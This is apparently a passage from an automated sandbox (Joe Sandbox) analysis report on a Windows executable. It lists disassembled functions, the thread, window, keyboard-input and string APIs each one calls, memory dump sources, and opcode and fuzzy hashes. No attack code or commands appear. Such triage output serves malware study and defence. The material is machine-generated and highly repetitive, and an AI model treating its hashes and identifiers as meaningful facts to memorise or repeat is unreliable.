                                                            • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                            • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                            Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                            • __calloc_crt.LIBCMT ref: 00413DB0
                                                            • __getptd.LIBCMT ref: 00413DBD
                                                            • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                            • _free.LIBCMT ref: 00413E07
                                                            • __dosmaperr.LIBCMT ref: 00413E12
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                            • String ID:
                                                            • API String ID: 155776804-0
                                                            • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                            • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                            • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                            • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                            Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                              • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                            • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                            • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                            • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                            Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                            • ExitThread.KERNEL32 ref: 00413D4E
                                                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                            • __freefls@4.LIBCMT ref: 00413D74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                            • String ID:
                                                            • API String ID: 259663610-0
                                                            • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                            • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                            • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                            • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                            Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 004302E6
                                                            • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                            • GetClientRect.USER32(?,?), ref: 00430364
                                                            • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                            • GetWindowRect.USER32(?,?), ref: 004303C3
                                                            • ScreenToClient.USER32(?,?), ref: 004303EC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                            • String ID:
                                                            • API String ID: 3220332590-0
                                                            • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                            • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                            • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                            • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                            Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                            • String ID:
                                                            • API String ID: 1612042205-0
                                                            • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                            • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                            • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                            • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                            Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strncmp
                                                            • String ID: >$U$\
                                                            • API String ID: 2666721431-237099441
                                                            • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                            • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                            • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                            • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                            Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0044C570
                                                            • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                            • String ID:
                                                            • API String ID: 2221674350-0
                                                            • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                            • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                            • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                            • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                            Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$_wcscat
                                                            • String ID:
                                                            • API String ID: 2037614760-0
                                                            • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                            • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                            • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                            • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                            Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                            • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Variant$Copy$AllocClearErrorLastString
                                                            • String ID:
                                                            • API String ID: 960795272-0
                                                            • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                            • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                            • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                            • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                            Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                            • EndPaint.USER32(?,?), ref: 00447D13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                            • String ID:
                                                            • API String ID: 4189319755-0
                                                            • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                            • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                            • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                            • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                            Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                            • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                            • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow$InvalidateRect
                                                            • String ID:
                                                            • API String ID: 1976402638-0
                                                            • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                            • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                            • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                            • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                            Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                            • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                            • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                            • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                            • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                            • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                            • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                            • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                            Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Variant$Copy$ClearErrorLast
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 2487901850-572801152
                                                            • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                            • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                            • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                            • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                            Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
